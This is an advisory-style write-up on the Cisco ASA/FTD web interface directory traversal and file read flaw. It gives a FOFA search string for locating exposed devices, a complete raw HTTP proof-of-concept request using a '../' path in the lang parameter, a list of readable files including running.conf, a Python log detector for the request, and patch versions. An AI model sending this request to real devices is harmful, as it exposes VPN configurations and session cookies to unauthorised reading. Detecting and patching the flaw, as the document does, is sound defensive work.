Vulnerability description
The web management interface of Cisco Adaptive Security Appliance (ASA) firewall devices and Cisco Firepower Threat Defense (FTD) devices has an unauthenticated directory traversal and remote arbitrary file read vulnerability. It allows an unauthenticated remote attacker to carry out directory traversal attacks and read sensitive files on the target system. The vulnerability cannot be used to gain access to ASA or FTD system files or underlying operating system (OS) files. It can only read files in web system directories, such as WebVPN configuration files, bookmarks, web cookies, part of the web content, and Hypertext Transfer Protocol URLs.
Affected versions
Vulnerability reproduction
FOFA search keywords:
/+CSCOE+/
The PoC request is as follows:
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en
The following files can be read:
"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"
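A log check for the request shown above, added here as an example and not part of the original write-up. It assumes the device's web requests reach a proxy or collector that writes combined-format access logs; the sample lines, the function names and the log format are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/+CSCOT+/translation-table"  # path taken from the request on this page
# Request field of a combined-format log entry; the log format is an assumption.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SAMPLE_LOG = [  # constructed lines, not captured traffic
    '198.51.100.7 - - [01/Feb/2021:10:00:01 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Feb/2021:10:00:02 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=%2f%2bCSCOE%2b%2fsession.js&lang=%2e%2e%2f HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Feb/2021:10:00:03 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&lang=en HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Feb/2021:10:00:04 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 900',
]


def fully_unquote(value, rounds=3):
    """Percent-decode a fixed number of times so nested encodings normalise before matching."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def inspect_line(line):
    """Return a finding dict when a log line matches the traversal pattern, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if fully_unquote(parts.path).lower() != ENDPOINT.lower():
        return None
    params = parse_qs(parts.query)  # also decodes %2b in textdomain to '+'
    lang = fully_unquote(params.get("lang", [""])[0])
    textdomain = fully_unquote(params.get("textdomain", [""])[0])
    reasons = []
    if ".." in lang.replace("\\", "/").split("/"):
        reasons.append("lang has a parent-directory segment")
    if "/" in textdomain or "\\" in textdomain:
        reasons.append("textdomain carries a path")
    if not reasons:
        return None
    return {"status": int(m.group("status")), "textdomain": textdomain,
            "lang": lang, "reasons": reasons}


def scan(lines):
    """Return (line_number, finding) pairs for every suspicious line."""
    hits = ((n, inspect_line(line)) for n, line in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]
```

Calling scan(SAMPLE_LOG) flags lines 1 and 2; a finding with status 200 means the device answered the request and should be triaged first.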
Remediation
Cisco ASA:
Versions before 9.6: upgrade to a fixed version
9.6: upgrade to 9.6.4.42
9.7: upgrade to a fixed version
9.8: upgrade to 9.8.420
9.9: upgrade to 9.9.2.74
9.10: upgrade to 9.10.1.42
9.12: upgrade to 9.12.3.12
9.13: upgrade to 9.13.1.10
9.14: upgrade to 9.14.1.10
Cisco FTD:
6.2.2: upgrade to a fixed version
6.2.3: upgrade to 6.2.3.16
6.3.0: upgrade to 6.3.0.5 (Hot Fix)/6.3.0.6/6.4.0.9 (Hot Fix)/6.6.0.1
6.4.0: upgrade to 6.4.0.9 (Hot Fix)/6.4.0.10
6.5.0: upgrade to 6.5.0.4 (Hot Fix)/6.5.0.5/6.6.0.1
6.6.0: upgrade to 6.6.0.1
Cisco FTD Hot Fix details:
6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5.0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_O-6.5.0.5-3.sh.REL.tar
To upgrade Cisco FTD to a fixed version using the sh.REL.tar packages, customers can perform one of the following operations:
For devices managed with Cisco Firepower Management Center (FMC), use the FMC interface to install the upgrade. After the installation is complete, reapply the access control policy.
For devices managed with Cisco Firepower Device Manager (FDM), use the FDM interface to install the upgrade. After the installation is complete, reapply the access control policy.